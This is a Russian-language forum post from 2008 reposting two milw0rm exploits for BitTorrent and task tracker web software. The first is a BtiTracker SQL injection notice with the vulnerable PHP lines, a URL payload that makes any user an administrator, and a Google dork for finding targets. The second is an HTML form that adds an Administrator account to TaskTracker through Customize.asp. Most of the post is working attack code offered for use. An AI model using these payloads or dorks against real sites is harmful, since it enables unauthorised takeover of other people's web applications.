Тема: Уязвимости движков трэкеров
Показать сообщение отдельно

  #2  
Старый 11.05.2008, 14:23
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию
BtiTracker <=v1.4.1

Код:
#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerabitity: Remote Sql Injection /	                                        
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]
TaskTracker all versions

Код:
<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
       	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
    	<input type="submit" value="Gonder">
    	</form>

# milw0rm.com [2007-01-01]